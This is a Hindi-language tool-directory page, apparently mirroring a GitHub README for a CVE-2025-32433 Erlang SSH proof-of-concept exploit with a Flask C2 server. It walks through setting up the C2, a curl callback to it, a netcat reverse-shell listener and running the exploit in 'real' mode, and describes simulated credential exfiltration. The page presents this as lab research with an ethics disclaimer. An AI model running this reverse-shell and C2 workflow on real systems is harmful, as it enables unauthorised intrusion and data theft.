Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
POC_CVE-2025-32433 — CVE-2025-32433 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें सिम्युलेटेड और वास्तविक हमले के मोड शामिल हैं, जिसमें रिवर्स शेल कॉलबैक और पोस्ट-एक्सप्लॉइटेशन सिमुलेशन के लिए Flask-आधारित C2 सर्वर शामिल है। | Kitploit
उपकरण/GitHubGitHub/ekomssavior/poc_cve-2025-32433
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट
GitHubekomssavior/poc_cve-2025-32433

POC_CVE-2025-32433

CVE-2025-32433 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें सिम्युलेटेड और वास्तविक हमले के मोड शामिल हैं, जिसमें रिवर्स शेल कॉलबैक और पोस्ट-एक्सप्लॉइटेशन सिमुलेशन के लिए Flask-आधारित C2 सर्वर शामिल है।

रिपॉजिटरी देखें
5271 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

⚠️ नैतिक अस्वीकरण

इस रिपॉजिटरी में वह कोड है जो एक वास्तविक CVE (CVE-2025-32433) प्रदर्शित करता है।
इसे केवल उन वातावरणों में उपयोग करें जहां आपके पास स्पष्ट प्राधिकरण है।

इस एक्सप्लॉइट का परीक्षण उन प्रणालियों पर कभी न करें जिनके आप स्वामी या प्रबंधक नहीं हैं।
अनधिकृत उपयोग अवैध, अनैतिक और साइबर सुरक्षा समुदाय के लिए हानिकारक है।

CVE-2025-32433 के लिए सिम्युलेटेड और वास्तविक POC

मेरे दोस्त Chocapikk ने मुझे यह मिला हुआ poc erling_cve.py दिखाया, मैं उत्सुक था और इसे एक सुरक्षित वातावरण में परीक्षण करना चाहता था।

आपके पास इस रिपो के साथ दो विकल्प हैं: सुरक्षित सिम्युलेटेड स्क्रिप्ट और सिस्टम जो मैं नीचे बताता हूँ।

या फिर आप असली erling_cve.py का उपयोग कर सकते हैं (नैतिक तरीके से, सावधानी के साथ और केवल उन नेटवर्कों पर जिनके परीक्षण की आपको अनुमति है)।

इस उपकरण का उपयोग करके वास्तविक शोषण का परीक्षण या चलाने से पहले मेरे दोस्त m0usemm0use और CVE-2025-32433 के लिए संवेदनशील लक्ष्य खोजने वाली उनकी पायथन स्क्रिप्ट को देखें!!!!

https://github.com/m0usem0use/erl_mouse


cve-2025-32433 के लिए शोषण का सिम्युलेटेड संस्करण

C2 सर्वर सेट अप करें

Python Flask-आधारित C2 बनाएं: बॉट कॉलबैक या रिवर्स शेल के लिए शक्तिशाली।

C2 सर्वर पर यह सेटअप स्क्रिप्ट चलाएँ

apt update && apt install python3-pip git -y

sudo apt install python3-flask

mkdir ~/c2

cd ~/c2

nano c2_server.py (paste in c2_server script edit as needed)

run

python3 c2_server.py

बॉट्स (या परीक्षण स्क्रिप्ट) इस तरह curl कर सकते हैं

curl -X POST http://:8080/report -d "Bot is online"

Kali पर Python venv सेट अप करें

mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab

Python वर्चुअल वातावरण बनाएँ

python3 -m venv venv

source venv/bin/activate

sudo apt install python3-requests

कॉलबैक का परीक्षण करें

nano test_callback.py (paste in test_callback script and edit as needed)

कॉलबैक चलाएँ

python3 test_callback.py

अब आपके पास आधिकारिक रूप से है

एक कार्यशील venv एक लाइव क्लाउड C2 कार्यात्मक कॉलबैक इंजेक्शन

-आपको लक्ष्य/पीड़ित मशीन पर एक Erlang प्रक्रिया या सेवा (या सिम्युलेटेड) की आवश्यकता है


Eerling_cve.py क्या करता है?

लक्ष्य IP के पोर्ट 22 से कनेक्ट होता है

नकली SSH संस्करण स्ट्रिंग भेजता है

एक गढ़ा हुआ पैकेट भेजता है (संभवतः कमजोरी को ट्रिगर करने के लिए — Erlang के अप्रलेखित SSH हैंडलर या बफर ओवरफ्लो का दुरुपयोग करने का दिखावा करता है)

हमलावर IP पर वापस एक रिवर्स शेल ट्रिगर करता है

whoami, uname जैसे कमांड चलाकर और /tmp/exfil.log पर नकली 'credential exfil' करके पोस्ट-एक्सप्लॉइटेशन का अनुकरण करता है

हम अपने मिले Erlang-ish PoC को लेंगे और

इसे Kali venv के अंदर कार्यात्मक बनाएँगे

जब 'हमला' चलता है तो इसे हमारे क्लाउड C2 को रिपोर्ट करने के लिए तार करेंगे

इसे नैतिक रूप से और सुरक्षित रूप से नियंत्रित प्रयोगशाला में चलाएँगे

चोरी किए गए डेटा का अनुकरण करने के लिए इसे /tmp/exfil.log उत्पन्न करते देखेंगे


काली मशीन से

nano poc_erlang_test.py

-poc_erlang_test.py में पेस्ट करें और आवश्यकतानुसार संपादित करें

एक लिस्टनर खोलें

एक नए टर्मिनल में चलाएँ

nc -lvnp 4444

poc चलाएँ

python poc_erlang_test.py --real

टूल डाउनलोड करें